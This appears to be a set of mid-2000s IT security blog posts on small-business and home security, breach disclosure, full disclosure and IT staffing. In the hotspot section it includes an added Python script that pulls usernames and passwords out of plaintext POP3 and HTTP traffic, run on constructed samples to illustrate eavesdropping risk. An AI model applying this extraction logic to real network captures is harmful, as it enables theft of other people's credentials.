This paper discusses bypassing NAC systems. The presentation is also available.
.: weekly it stream of consciousness ramble: relics and creep
HostGator was apparently not alone. At least two other companies had reportedly also been hit with the attack, an exploit for a previously unknown--or "zero-day"--vulnerability in a popular Web-site management application known as cPanel. (SecurityFocus)

One thing that scares me about many companies is their propensity to have what becomes a highly heterogeneous environment with lots of little things purchased and installed or freely downloaded and implemented in their environments, sometimes circumventing IT involvement. And one little thing like a third-party web-based app can cause an entire server or network to become owned and jeopardize a company's existence.

I had more of a purpose for this post, but I ended up turning myself in circles. Homogenous environments vs heterogeneous environments, simplicity vs defense in depth, all-in-one devices vs separation of duties...

In the end, companies simply have to keep control of what they install and run in their networks, especially Internet-facing exposures, and maintain a process (with proper staff devoted to it) to keep up to date with patches and alerts for those exposures. While OS patches and "big" apps like Apache and OWA are typically tracked, far too many little things that slowly seep into the network landscape get overlooked. That ticket management system that was put in 2 years ago, or that survey "engine" on the corporate web site, or how about that php bulletin board that hasn't had an update in 12 months. What about that port that was demanded to be opened 3 years ago to allow a temporary FTP server that was never cleaned up? Does marketing really need that nifty new tool on the web site, or WebDav turned on because that's the only way their contracted, at-home employee knows how to update websites?

While I like to call some of those things "network relics," I think I will also start applying a term, "network creep," to all the various little things that slowly make their way onto or into the systems and network that IT manages. This creep slowly expands the exposure for a company and unless there is strong change management, follow-up, and staff hours to devote, these creeps turn into relics.

Policy and processes (retirement of systems and apps...). Inventory and documentation. Standards. Logging and monitoring. Staff. Change management.

I'll stop now before I get to rambling too much more.

.: 5 security steps for small businesses

Tate over at ClearNet Security made a post about a friendly debate over the top 5 things a start-up company (read: small company) can do to start out the right way in regards to a safer computing environment. I thought this would be a good exercise in determining what my own top 5 recommendations to a similar fictional company would be. Granted, doing a top 5 instead of a top 6 or however many top picks it takes to do security right is a little limiting for no real reason, but this limit does help focus a bit more. This can also act as a general checklist for consultants or any outsourcing of solutions a start-up does, especially ones without in-house IT staff. I also try to recommend free solutions as a starting point, especially for small companies without IT budgets.

1. Backups. This is the #1 thing to do to keep a business alive and running. My underlying assumption is that incidents will occur. If you don't have data backups, you will not survive many larger incidents. A requirement would be offsite backups, even if it is just at the CEO's home and maybe the CFO's home. Everything else for security should be dropped until this is done. Backups can be as simple as some batch files like Robocopy dumping data onto firewire or USB drives every night, with manual swapping of cables every day or week. Desktop systems can be set to perform regular system backups to a central storage if need be. Test backups regularly, test restore procedures regularly to ensure that they are working and to keep someone knowledgeable about the process. Make sure workers copy important data to central servers every night or Friday, or a location that is backed up. Having even an elaborate file server and backup scheme is defeated internally if users keep their data on their systems and those systems are not backed up themselves.

2. Network firewall on the Internet link. Put up a network firewall on the Internet link and be draconian in the rules. Default Deny, and limited access elsewhere, even if it means nearly zero access from the outside. Small start-ups might be able to contract out to a local Linux expert or friend of the company to throw in a largely free Linux solution. Something like SmoothWall/IPCop may be better, as a slightly tech-savvy worker may be able to understand and work the web-based configs better than Linux iptables and such. But, if possible, invest in a Cisco Pix or Juniper NetScreen or Windows SMS/ISA solution and contract someone to set it up for you.

3. Desktop Antivirus. Evaluate some robust and light-weight products for Antivirus protection. For the most protection, I would not pick Norton or McAfee (most malware that is truly dangerous looks for and disables them anyway), but rather look into Kaspersky or F-Secure instead. For free options, AVG and ClamWin are decent enough. A good case can be made for network-based Antivirus on the gateway in a smaller company, but most new desktop/laptop systems come with host-based AV anymore, so you may already get half of it done without the extra burden. Obviously, the apps should be set to regularly scan the systems, automatically clean/delete, provide realtime scanning and stopping of virus execution, and be set to update at least daily, every 8 hours if possible.

4. Patch Management. Turn on your Windows Automatic Updates to force installation upon a subsequent reboot. Try to do this with Office if at all possible. Updates should be done as soon as possible, preferably once a week on a Thursday or Wednesday. Workers should regularly do manual updates, even if it just verifies that automatic updates are working just fine.

5. Man, the dreaded last spot. Do I use physical security here, as losing the time and equipment for a small company can cost dearly? I guess when it comes down to such a short list, I have to look at what will best help the company survive and prosper to a point where the luxuries of security can be afforded. I would side with physical security here. Make sure doors are locked properly and possibly invest in an alarm system. If the company is in a business park, get to know the security stance of the business park owners and possibly work with them to provide for alarms or anything else they may do for you. If possible, lock down all systems at the desktop and secure any server equipment behind another locked door or at least out of sight behind some other door. The costs of these protections are far outweighed by the loss incurred in their absence.

I will cheat and put in a 5.5, since it is not only dealing with security, but insurance purposes as well. Inventory all systems and keep that up to date. This can just be some spreadsheet available with dates of purchase, serials, hardware details, software licenses, etc. Starting this early helps. Inventory can be morphed into talking about baselining an environment. Know what you have and what is normal in your environment. What systems are expected, what software is expected, what sort of traffic levels you expect, what log entries are normal. This baseline effort can then lead to quickly recognizing when something is abnormal and needs investigating.

A really close next consideration is to acquire desktop/security help either with some low-cost outsourcing or just hire a guy internally to manage systems, clean spyware, try out new software, help test new products, etc. This can help provide a company with someone to turn to for slightly more authority than your average user, and help a budding IT professional get his chops cut on some real experience. There are plenty of IT professionals out there who would be glad to consult either on the side of their daytime gig (be open to only getting support outside business hours) or add you as part of their already established clientele.

Lastly, if the small company insists on a wireless network, then I have to include wireless security as part of the list. The wireless network must not remain open and needs to be protected using WPA. Yes, this might be a hassle with visiting guests and potential clients, but the consequences of some high school kid driving by and mucking in your network can be dire.

.: being ornery about the corporate ethics compass and security training

A Canadian article discussed the results of an IT security survey. A couple blurbs caught my attention.

According to the 2006 Global State of Information Security survey, 53 per cent of Canadian companies surveyed said their reputation was driving their information security spending. The global average was 41 per cent.

"Poor information security that loses data such as customer profiles can seriously affect a company's brand," says Greg Murray of PricewaterhouseCoopers. "The cost of handling the public relations issues associated with losing customer identities can be devastating."

Now, while companies are economic entities, and realistically, this may be the real deal honest truth when execs look at IT security and the effects, I can't help but think of how unethical this attitude seems to be. So, in the absence of a government forcing disclosure of losses, these companies would not divulge the information. In addition, if customers do not care or the company would not be affected financially, they wouldn't disclose it. That attitude is also degrading to security/IT staff for those companies. "I only do good just because it helps me avoid getting into trouble." It's a classic example of negative reinforcement. I would prefer that we didn't need that reinforcement and that the actions were done ethically due to the company just being that way. But that may be way too idealistic of me to expect... (Then again, avoiding negligence issues can also be the same way, so maybe I'm being nitpicky on something I really should not be...quite likely in fact, so I will strike this whole paragraph, but leave it for future reference by me.)

Mr. Murray was surprised to find that 61 per cent of Canadian respondents surveyed have limited or no security training for the end-users of technology – their employees.

Training is a fun debate and can go both ways. Fundamental training should be necessary for employees. I've known way too many people who truly didn't know something like surfing web pages willy-nilly was bad, and they were genuinely receptive to the information. Some of whom may even have changed their behaviors due to the new knowledge. But much like teenage pregnancy and drug use and various crimes, you can only inform the "general public" so much. Security will not become suddenly solid when all users are given excessive amounts of training in the workplace. I mean, if that were possible, perhaps we could have had a much different president these past 6 years if we had just informed the US public more? ;-)

.: the little things, the fundamentals
For want of a nail, the shoe was lost; For want of the shoe, the horse was lost; For want of the horse, the rider was lost; For want of the rider, the battle was lost; For want of the battle, the kingdom was lost; And all for the want of a horseshoe nail.

For one missed log entry or one shortcut taken...

.: it ain't broken if we don't see it

Brian Krebs, WashingtonPost.com, writes:

...far too many sites are compromised each month by hackers and scammers while their owners remain completely oblivious or in denial.

Logging and monitoring are hugely important, especially for catching break-ins and data theft. Data destruction is easy to see, but data theft is just copying data silently.

IT and business are becoming more and more enamored with feeling secure, or rather the attitude of, "We'll look at the logs when something bad happens or we suspect something bad has happened," which really means, "If we don't look at the logs, nothing's wrong, so let's just go about our business." Or a company will throw in an IDS/IPS device or log parser, but not devote the on-going manhours or staff to properly understand the device and be able to accurately monitor/parse while also being given ample time to investigate and acknowledge the various alerts.

Data theft will not necessarily get better soon. Large-scale regulations like PCI and others are really pushing the standards higher, but they are still ambiguous at times, and can make companies look better on paper than they really are in practice. Legislation on disclosure of breaches has really only resulted in negative reinforcement for business, but a feeding frenzy for media as companies and agencies now have to divulge incidents that have always been happening anyway. This makes it seem like it is on the rise, when in fact we're just getting the problem more out in the open finally. I don't see this dying off for at least another 6 years. Once all the big businesses are shored up, we'll see tons of smaller businesses like those mentioned in the article posted above.

I foresee for a number of years, yet, businesses stepping as lightly as possible on this issue. Doing just enough to avoid negligence and satisfy regulations, but not enough to really have to admit to any problems or divulge them. "Yes, we log and monitor, but we don't see anything, so everything is a-ok! I'm sorry you had your data stolen, but we do what we can, so better luck next time."

While this may feel good today, this is not a scalable or sustainable approach.

From my vantage point in IT, I can also say that logging and monitoring and even security are not high on the lists of execs to spend money on, managers to raise issues about, or staffers to spend time on. Our #1 priority is making sure the network and systems are up for the company. This can be 100% time utilization. Our #2 priority tends to be projects that either enhance the functionality (not security necessarily) of the current network and systems or projects that are directly related to revenue-generating people or processes or clients.

Security is not yet up there, let alone logging and monitoring and responding to those logs in an ethical fashion. This is true also of software and web application developers. Functionality and deadlines and bottom-lines first, then maybe performance. Security added later (and too often just never added).

.: 10 security steps for home users

Companies and home users are definitely different entities with different approaches to computer security. Not only are some of the items different, but the solutions as well. What is important to a business may not be important at all to a home user, and the reverse is true as well. Home users value system performance, ease of use, stability, security of their personal data, and security with their identities. Home users can both be the hardest to break into and the easiest to break into, from a security standpoint.

Not every home user is technically inclined or even wants to learn to use new programs and such for being secure. For this reason, many of the best pieces of advice for home users are behavioral. Rather than "learn Linux and implement a highly guarded firewall" most users will read that and not even try. That's just too much effort to ask of most people.

You can also go crazy trying to keep up with the latest security news, updates, vulnerabilities, and patches. But why bother? Unless you're a geek or an IT professional, there is no reason to spend personal time being paranoid. Instead, home users can benefit from education and careful habits when working or playing on their computers.

For home users, I assume the user is just operating one or a couple systems for the primary purpose of surfing the web, gaming, entertainment, and personal uses. No servers, web servers, mail servers, etc, are assumed. Once you get real servers with open services, the game changes quite a bit, and most home users do not do those things anyway.

1. Backups. Always back up important data to a second hard drive or system. If possible, do it twice and keep one set offsite somewhere. Windows has built-in mechanisms for automatic backups, but if you don't mind doing it, at least just drag-n-drop all the important stuff over. Imagine if your hard drive dies in the next hour and no data is recoverable. What is your pain? What will you miss? What cannot be recreated? Back that up. USB or Firewire drives are cheap and easy to get. Buy a spacious one and use it for backing up data regularly. If you can back your data up to a drive stored offsite or in a fireproof safe, that is even better.

2. Firewall or NAT the Internet link. Actually, it is much easier and more common for home users to simply operate behind a NAT device such as a typical cable router or wireless router from Best Buy. That is typically enough, but if the opportunity is there, run behind a Linux firewall, either iptables or SmoothWall/IPCop or something. This one step is enough to stop any curious Internet-side parties from getting into your systems. If you're not sure if you are protected by a NAT device, ask someone you know to check, or call your ISP and ask their support if they know. Be ready to let them know what your cable modem or DSL router model is. If you are not behind a NAT device, ask about how you can implement one. Most ISPs have recommendations and instructions on this.

3. Turn on Windows Automatic Updates. Every now and then perform a manual Windows Update, but otherwise just turn on Automatic Updates to automatically download and install on at least a weekly basis at a time when the computer will be on (like 8pm or something). Not only will this apply necessary patches, but can enhance or fix features like wireless options.

4. Practice safe computing. Do some common sense things to stay safer online. First, don't install every new and neat free program that tells you to install something or that you need something. Chances are, there is a reason it is free and enticing. Treat it like you would any advertising on television or radio and just be wary. Second, do not open any email attachments that are not sent from known people and are expected. Just delete those emails. Likewise, do not click on any links in emails unless from known people and the email is expected. When in doubt, just delete the message or type the address into your web browser as opposed to copying it or clicking it. Third, do not frequent questionable sites, especially when using IE. If you are visiting a site you wouldn't want your parents or kids to know you were visiting, chances are you shouldn't be there. Avoid that darker and more dangerous side of the web. Fourth, always close pop-up windows. Never click inside them or respond to ads on sites. Just never do it. Fifth, if possible, use only one credit card for online purchases, keep the credit limit as low as you can while allowing you to do what you need, and always go over the monthly statements.

5. Protect your passwords. Write down all your passwords and put them someplace safe, but easy to get to while at your computer. I know, many security people will look aghast at this suggestion, but when it comes to home users, there is little real reason to trouble people with anything more complicated. Get an envelope and write down your passwords on paper inside it, and keep it tucked safely into a drawer or even inside a book. I suggest making two copies of this and storing one somewhere offsite, especially if you do lots of banking and other monetary things online. You don't want to lose your accounts because you lost your passwords in a fire or something. I do suggest not sharing passwords amongst spouses, roommates, or even your kids. Don't let them find or use those logins. Also, do not use the same password for everything. I find it best to have 3-7 different passwords. For anything you don't care about, use your first password. For more sensitive things, use other passwords. You can use multiple, but just think if one password is swiped by a hacker and is linked to your email account which has the same password. You can't usually protect yourself from lost accounts on various websites or even forums. They may be run by unethical people or they may be victims themselves of a break-in that divulges your personal information. More technically inclined users can look into using a program like PasswordSafe to store their passwords securely on their computer. Be sure to make a backup of the storage file.

6. Don't use Outlook or IE. Yes, IE and Outlook are easy to use and everyone uses them, which makes getting informal support painless. But just as ease of use is high for users, ease of use for malware is even higher. IE has had holes for years, unpatched, deep holes, and will continue to have them because it is so deeply married into Windows itself. Ask any IT pro to uninstall IE for you, and you will get the wide-eyed response that they can't. IE is so deeply rooted into Windows that you cannot separate it out. That's dangerous, and Outlook is no better. Instead, use something less mainstream and less heavily targeted. I recommend Firefox as the default web browser and Thunderbird as the email client. Both are free, easy to use once someone opens their mind up and accepts a little bit of change, and suffice for 98% of everything users do with email and web surfing. This software switch will nearly eliminate the risk from email worms (although it will not stop spam, or malware attachments that are designed for the user to execute rather than running from a preview pane or through Outlook's tools) and drastically lower adware and spyware infections from web surfing.

7. Run antivirus software. Most new computers come with antivirus software. Be sure it is set to update automatically, and pay for the protection if required. For somewhat technically inclined home users who practice safe, common sense computing, this software may not be entirely necessary, but I suggest it for decent protection, detection of most malware, and peace of mind. I suggest F-Secure or Kaspersky as opposed to Norton or McAfee, but chances are the latter two came with the new PC. If so, stick with what is pre-installed. And yes, make sure it downloads new updates or signatures on a daily basis.

8. For wireless at home: secure your wireless. If you run wireless at home, be sure it is secured by at least WEP encryption, and use WPA with a long passphrase if your hardware supports it. WEP is better than nothing, but its encryption is known to be broken and can be cracked by anyone with the right tools, so it only keeps out the casual neighbor. Either one will prevent the vast majority of neighbors from hopping onto your wireless connection. Not only can they use your Internet link for their own traffic (legal or illegal), but they can also probe at your network and computers and sniff your traffic if they get on. And yes, trust me, young adults and kids are curious creatures and will try these things if they have that sort of knowledge. Turning on WPA will keep out all but the most determined attackers; WEP will not.

9. For laptop users: be paranoid at hotspots. Lots of people get fancy with recommending Tor or even SSH proxying for secure access at wireless hotspots. But let's face it, only the technically inclined bother with such things. For all other users, just assume the wireless hotspot is not a safe network. Do not stay on hotspot networks for too long. Do not log into email through Outlook or Thunderbird when at a hotspot, since POP, IMAP and SMTP without SSL send your password in the clear. Do not log into a website that is not SSL-enabled. If you use IM, assume your conversations are being read by someone sitting near you, and, in some cases, assume they now have your login account and password. If you had to chat over IM or check email while at a hotspot, change the passwords for those accounts as soon as you get home. Hotspots are fun places for geeks like me who are curious about other people, and for people who would love to do you harm or mischief. Be safe when not at home. Now, what counts as a wireless hotspot? Any wireless network that is not your home network.
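To make the warnings in steps 8 and 9 concrete (a neighbor on your WLAN can "sniff your traffic", and at a hotspot you should "assume your conversations are being read"), here is an added example, not code from the original post, of what an eavesdropper on the same wireless network can pull out of unencrypted traffic. The captured payloads are constructed by hand to stand in for frames sniffed off the air; nothing here opens a network interface, and the hostnames and credentials are made up. Plaintext POP3 and HTTP logins give up the username and password outright; an HTTPS connection shows only opaque TLS records, which is exactly why the advice above says to insist on SSL.

```python
"""Toy eavesdropper: what plaintext logins look like to someone on the same
wireless network. Added example with constructed sample payloads; it never
touches a real interface."""
import base64
import re
from urllib.parse import parse_qs

PASSWORD_FIELDS = ("password", "passwd", "pass", "pwd")
USERNAME_FIELDS = ("username", "user", "login", "email")

# Constructed sample "captures": (label, raw TCP payload as it would appear
# in a sniffed frame). These are hand-written stand-ins, not real traffic.
SAMPLE_CAPTURES = [
    ("POP3 login, no SSL",
     b"USER alice@example.org\r\nPASS hunter2\r\n"),
    ("HTTP Basic auth",
     b"GET /webmail/ HTTP/1.1\r\nHost: mail.example.org\r\n"
     b"Authorization: Basic " + base64.b64encode(b"bob:letmein") + b"\r\n\r\n"),
    ("HTTP form login",
     b"POST /login HTTP/1.1\r\nHost: forum.example.org\r\n"
     b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
     b"username=carol&password=s3cret%21&remember=1"),
    # First bytes of a TLS handshake record (type 0x16, version 3.x); the
    # rest is padding because the content is opaque to us anyway.
    ("TLS ClientHello (HTTPS)",
     bytes.fromhex("16030100400100003c0303") + bytes(53)),
]


def is_tls(payload: bytes) -> bool:
    """True if the payload looks like a TLS record (handshake or application
    data, version 3.x). An eavesdropper sees these bytes, not what they carry."""
    return len(payload) >= 3 and payload[0] in (0x16, 0x17) and payload[1] == 0x03


def extract_pop3(payload: bytes):
    """Plaintext POP3 sends the USER and PASS commands in the clear."""
    text = payload.decode("ascii", errors="replace")
    user = re.search(r"^USER (\S+)", text, re.M)
    pw = re.search(r"^PASS (\S+)", text, re.M)
    return [("pop3", user.group(1), pw.group(1))] if user and pw else []


def extract_http(payload: bytes):
    """Pull credentials out of a plaintext HTTP request: a Basic auth header
    (base64, not encryption) and URL-encoded login forms."""
    found = []
    head, _, body = payload.partition(b"\r\n\r\n")
    headers = head.decode("latin-1", errors="replace")
    m = re.search(r"^Authorization: Basic (\S+)", headers, re.M | re.I)
    if m:
        try:
            user, _, pw = base64.b64decode(m.group(1)).decode("utf-8").partition(":")
            found.append(("http-basic", user, pw))
        except (ValueError, UnicodeDecodeError):
            pass
    if re.search(r"^Content-Type: application/x-www-form-urlencoded", headers, re.M | re.I):
        fields = parse_qs(body.decode("utf-8", errors="replace"))
        user = next((fields[k][0] for k in USERNAME_FIELDS if k in fields), "")
        pw = next((fields[k][0] for k in PASSWORD_FIELDS if k in fields), None)
        if pw is not None:
            found.append(("http-form", user, pw))
    return found


def extract_credentials(payload: bytes):
    """Return (protocol, username, secret) tuples readable in one payload.
    TLS payloads are opaque and yield nothing; that is the point of HTTPS."""
    if is_tls(payload):
        return []
    if payload.startswith((b"USER ", b"PASS ")):
        return extract_pop3(payload)
    if re.match(rb"^(GET|POST|PUT) \S+ HTTP/1\.[01]\r\n", payload):
        return extract_http(payload)
    return []


def scan(captures):
    """Run the extractor over a list of (label, payload) captures."""
    return {label: extract_credentials(payload) for label, payload in captures}


if __name__ == "__main__":
    for label, creds in scan(SAMPLE_CAPTURES).items():
        print(f"{label}: {creds if creds else 'nothing readable'}")
```

The same three plaintext logins would be just as readable to a neighbor who cracked your WEP key at home as to a stranger at the coffee shop; the only capture that gives up nothing is the one wrapped in TLS.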

10. Get help. As mentioned for small businesses, home users will benefit the most by befriending technically inclined friends and family, or even paying for the services of a home consultant or contractor to help you out. Always be nice to your experts, though, as we do tend to get tired of high maintenance users, especially if we're not being compensated for our time. I strongly suggest just asking your technical friends questions as opposed to asking them to actually do things for you. You can get a really good return, though, for paying someone a little bit of money to spend an evening or some hours tuning your system and giving you some education on what the best things to do are. All the steps above are either behavioral (education), one-time deals where you set it up and that is it, or a few that require some additional changes or on-going action. Spend some money, hire up someone on the side who knows their stuff. If nothing else, befriend them and make a night of it with pizza, beer, and maybe hang out for a movie or something while they do their wizardry.

PS: I added a "1/2" extra step in a later post on getting to know how to reinstall your operating system.

.: security posters
These security and networking posters might be worth the money someday. Kinda spendy, though...
.: apple/maynor and full disclosure

The weirdness of this whole debacle between Maynor/Cache and Apple involving possible Apple wireless driver exploits continues. There are some fishy things going on here, and Apple is being very shifty in their dealings.

I previously likened the weight and importance of this situation to what Michael Lynn went through with ISS and Cisco last year, and the similarities continue to grow. David Maynor has been forced to pull out of his revelatory Toorcon presentation which was probably going to finally pull the veil back on this situation.

Now, SecureWorks and Apple are working through a third party, CERT, on security issues. Sadly, there is the possibility that Apple may stiff-arm CERT as well, which kinda digs at a suggestion I read and agreed with that perhaps security issues need to be verified by a third party so that full disclosure and corporate protections can coexist.

Unfortunately, the integrity of a third party is then in question, as are the rules of engagement for that third party. As Brian Krebs mentions, what if CERT decides to just never authorize the release of information? We're back to having no real solution for the full disclosure debate.

If this keeps up, full disclosure will just plain happen, and corporations affected will simply be alienated from the research communities. Also, complete non-disclosure will happen by those who can't afford to fully disclose and possibly be attacked legally, which threatens the health of our systems and networks when corporations just stifle any problems with their products. In that case, one may as well sell the exploit to someone else.

Not only that, but just look at the comments on Brian Krebs' post to see exactly how inflamed and impassioned even the security industry can be, on both sides of the issue.

.: the grey area of data disclosure announcements

A little closer to home, it seems the University of Iowa has had to notify 14,500 persons that their data might have been disclosed. I like that the announcement qualified that the likelihood of disclosure was low. In other words, an attack was detected, the extent of the breach was unknown, and this data was accessible on the system.

This makes me shake my head and wonder when this disclosure storm will end. Disclosing possible data thefts and leaks is just not a scalable or long term solution. It is not even a short term solution. Very quickly we will all become numb to this activity, not care, and even if we understand what to do by reading the letters and FAQs, we still won't do much more or change our behavior as users and consumers.

But there are other reasons why this is a poor decision. For instance, there is this huge grey area in defining what counts as a disclosure. What if a system was broken into, but all indications point to the system being used to house pirated movies, and it *may* have had data disclosed? Do you have to disclose it if there is a reasonable expectation? What about a networked system that is not fully patched and is noticed to be out of date? Theoretically, it could have been attacked. What if the hosting company would not have detected such an attack? Is it reasonable to assume that system was never accessed fraudulently? And just where do 0day attacks fall into this picture? What if there is merely the potential for disclosure in the future, which is not all that unlikely given a Windows architecture and the mishmash inner organization of most IT infrastructure from the perspective of the malicious insider? Should we disclose when information is simply being stored in a non-optimal way?

And that is not even to begin to get into the grey areas within organizations on disclosure and reasonable expectations. Who is held accountable for hardening systems, detecting problems, escalating them to those that need to know, and then disclosing them? How much grey area or liberty will be taken with interpreting the regulations and expectations?

No matter the answers, the current practice of forcing disclosure of possible data thefts and possible identity theft is not a very good procedure and may do more harm in the long run than good. But at least it drives home to C-levels the need to pay attention to this stuff, and not just treat IT like some arcane entity working behind a large screen. The handling of information and data access is only going to become more and more important over the next 10 years (and anyone who has tried to track access to data and permissions in anything but a small corporation will be able to relate exactly how difficult this can be).

And yes, at least this is the start and it is something, as opposed to diving straight into analysis paralysis and doing nothing.

.: training

Having started a new job this past spring, I've had some firsthand experience in starting out in a new IT (networking/sysadmin) role. And I have since become pretty sensitive about what I think is one of the most important things with new IT hires.

Recently, more talk has surfaced about IT hiring the right people and then training them for their job, as opposed to hiring only people trained for the job and hoping they have the ethics and soft skills needed to do a quality and loyal job.

One of the biggest challenges, and in my mind, mistakes, in managing my new employment has been lack of real training when starting the job.

Let's face it, even in the midst of regulations and standards flying around about how IT should secure and run their operations, there are no two shops that do something even as simple as track and allocate IP addresses the same, let alone all the other little stuff and multitude of settings in servers and devices (one of the reasons I really do not enjoy Windows Sysadmin work as much as networking). This means that any new people are either going to sit back and wait to be shown what to do, or will attempt to dive right in and possibly screw something big up either right away or maybe not even detectable for months or years. While I do believe in just getting things done, I've seen what happens to people (especially in my last job) when they make a simple mistake or move forward too quickly and how that will paint them in the eyes of the people who matter and write the checks, even if those same people were the ones who put the pressure on getting things done quickly.

So I feel that job training early on is paramount, especially for any Windows Sysadmin type of support work that is not very finite or narrow.

Training will also acclimate new employees to existing employees and build some team camaraderie, which will more quickly open the avenues of discussion, collaboration, and comfort in asking for help when needed.

I think the best form of training is not necessarily documentation, although that is highly important, but actually shadowing coworkers, and not just for a half day or even a day, but for a few weeks, to get used to the tasks, load, culture, and attitudes of the job role and team. In this way, also, the new employee may confide their own comforts, interests, and desires to their colleagues more than to a manager, and thus their niche in the team may more quickly develop. This might bog down the existing employee who is being shadowed and sharing some of his workload with the new person, but in the long run, this is far better and I think will lead to a happier worker.

I feel that very, very few IT sysadmins and networking people can step into a job and do an effective job without lots of experience or in a contractual role that is narrow by definition.

Unfortunately, with my current job I had about a week and a half of corporate training with HR, phone systems, and other general stuff like benefits and customer service. This is all good and fine, but I had maybe a half day with the most senior analyst that I work with, and got shown the physical data center and where some things are. That was about it, for the most part...which has left me, 6 months later, still feeling disengaged and not entirely happy or comfortable with the job and network I work in. It is definitely an uphill battle that I am having to slowly tackle as the tasks slowly mount.

.: on users and it pros: working together

There have been a lot of articles and posts lately about users, the user experience, and how IT interacts with users.

My "first" read on this came a few months ago in Network World, What users hate about IT pros, to which I rough-drafted a response essay I never did post on here on exactly the opposite topic, What IT pros hate about users. In the past few weeks, even more posts:

the snide IT attitude | counterproductive approaches to IT | dan morrill #1 | locutus | dan morrill #2

So who is right and who is not? Honestly, they are all right, to an extent.

There are problems with IT staff and "normal" users meeting together to work effectively and create proper solutions for a business. But the subject is far more complicated than so many writers are trying to make it out to be. In order to really look at a solution that works for a given business, the IT roles need to be better defined, the corporate culture needs to be evaluated, and then the exceptions need to be acknowledged.

IT should be sliced into smaller chunks, as there are vastly different roles in an organization. What is important to an employee, and how that employee relates to things like users, differs even within our own field. Internal application developers will be different from those who develop applications sold to external users. IT shops that host services for external clients differ from those that just host internal infrastructure. A networker is different from a help desk jockey is different from a CIO. In fact, in each of those areas there are still different roles that the workers and managers each fit. A help desk jockey is different from a help desk manager.

Does a backend networker need to be attentive and aligned with business needs as much as his or her manager? Or perhaps the user-facing help desk jockey? What about an application developer creating a standard application that will be used by 100,000 customers versus the internal application developer creating a system to be used by 10 people all located inside the company?

Once those chunks are defined, one can then look at a target corporate culture and managerial paradigm. Only then can real statements about IT, users, and the relationship between them be effectively made. Are the users technical in nature or not? Does the corporate culture encourage worker-to-worker interaction across boundaries, or does all of that occur only at manager levels? Can a beer be involved? Is it important to the business to have a customized service or a standardized product?

Lastly, look for the exceptions. It is true, sometimes customers make unrealistic demands that are a detriment to IT or even the business. When a customer gets on a metro rail system, do they expect to be allowed to guide the train and stop it at exactly where they want to get off? No, and to demand such when getting on the train is unrealistic. Likewise, users getting on the IT train need to plan and make requests properly as well, or at least be open to the possibility that their (and every other user) request may not be met. While the metro rail customer may be able to appeal to the train boards to add a new stop that happens to be closer to their home, what if every user made that request no matter what part of the city they were in and are not satisfied until the train stops within a block of their house? In that case, many someones will be disappointed in their request.

There is something to be said about being a good IT provider, but also about being a good IT customer.

But what if there are to be general, blanket comments and attitudes made? Is there some credo that all IT people can live by to do their work effectively and prosperously in the business world?

Perhaps. In the end, it is not about making a better widget, improving uptime, or meeting every customer demand both internal and external. It all gets back to the things that matter in life, the soft skills of working well with people and users and IT pros. Be respectful, professional, and honest. Work together to make great things happen in a company.

To bring this back to information security, Dan Morrill says something I think is important and cannot be said enough. If we end up being roadblocks to users, users will adapt and do things some other way which may introduce security and audit issues, widen the gulf between them and IT, and cost the business money.

The real bugbear is trying to figure out how to best work with the users in a given role with a given corporate culture and with the exceptions that will occur.

.: the geek / business relationship

Go figure. Just this morning I read an internal IT newsletter about this same subject. All of this information is second-hand, but I may just check out this book soon. The book "The Geek Gap: Why Business and Technology Professionals Don't Understand Each Other and Why They Need Each Other to Survive," by Bill Pfleging and Minda Zetlin, claims that the "geek-suit" divide is inevitable. Here are some bullet points as to why:

• The tech worker, “the geek”, is a problem solver; the business person, “the suit”, is a people influencer. The geek likes to fix things, the suit relies more on people skills. Geeks and suits also interact with technology differently; the former are more interested in process while the latter are more consumed with use.

• To geeks, a piece of technology is a thing of beauty in its own right, a wonderfully fascinating puzzle. To suits, it's a tool that is only worthwhile if it helps them accomplish their objectives.

• The moment geeks are likeliest to lose interest in a project is when it's running perfectly ('Hooray! Now I can stop working on it!'). That's the moment suits are likeliest to start taking interest in the same project ('Hooray! Now I can start working with it!').

• Technology and business people differ in terms of career aspirations and lifelong goals, and relate differently to their workplaces. Tech people typically do not identify themselves by where they work but by what they do. It's more important to them that they are in the ‘community’ of, say, .Net programmers or database administrators rather than at the company where they work. Business people are much more about climbing their company's ladder.

The authors do go on to give points about how IT and business can help bridge that nearly inevitable gap, including cross-functional teams, intermingling, job exchanges, and business people doing what IT people now are doing: learning about how the other side works.

Since I spend most of my lunch periods nursing a latte at a nearby Barnes & Noble and recouping the cost by reading magazines and books, I may skim this to see if it is worthwhile to fully read and have on my shelf.

.: linux as main box - part 3: reinstall

I've reformatted my new laptop hard drive, installed Windows, and carved up the partitions to give Windows roughly 20 GB, Ubuntu 30 GB, and the other 50 GB for eventual virtual machines.

I did this because originally Ubuntu just decided to take the whole disk, and I've had experience with Windows just not playing nice with GRUB if Windows isn't loaded first. So now my system is in a more or less complete state to move forward again.

This also means I've spent a bit more time in Windows again, getting the new install configured up and things back to normal with email and such. Thankfully, since I build systems so much at work and home I've learned not to get fancy. Back in the day I worked with such things as WindowBlinds to make my Windows all fancy and neat and pretty and slick. But I quickly realized I don't want to spend a week redoing all that fancy crap every time I format.

Anyway, now that Windows is situated and my old drive is mounted in a USB enclosure fitted for laptop drives, I am now back into Ubuntu and moving forward with getting things installed and using it for more every day use. Next step this week sometime: get my email ported over from Thunderbird to...Thunderbird! Piece of cake!

.: you know, microsoft really is doing it right

This article got me thinking about how Microsoft is packaging some things into Vista that will put some current software makers into a real bind, such as free antivirus protection and free pdf creation/reading programs, and no doubt more.

Immediately I bristle at the notion that Microsoft can make these things better than those who specialize in them. I immediately think about all the monopoly issues that may arise, especially if Microsoft oversteps the line (particularly in Europe) and prevents competing products from being installed.

But the more I think about it, the more I truly think they have a good approach. The average consumer couldn't give two rat asses about needing third-party antivirus, firewalls, email spam blockers, or a secure web browser with a pop-up blocker, as long as there are decent enough features for your average middle-aged worker or teenage myspace rat (now displacing mall rats). When I buy a car, I might add on little package deals like ABS and airbags, but I certainly don't have to shop at Sears and pick from multitudes of vendors and pray I pick something compatible that does the job I want.

Consumers just want things to work with as much security as can be put in without getting too anal about it. This is the niche the Mac has enjoyed for quite some time: elegant simplicity and usability. Microsoft needs security in their OS, and they really cannot get away with just letting third-party software makers do the hard work they should be doing. Not only is it a bad long-term approach, but it also stymies the average consumer who doesn't want to constantly tinker with firewall settings and spyware scans and keeping up to date with 6 different programs and pay for those upgrades every other year...they just want it to work.

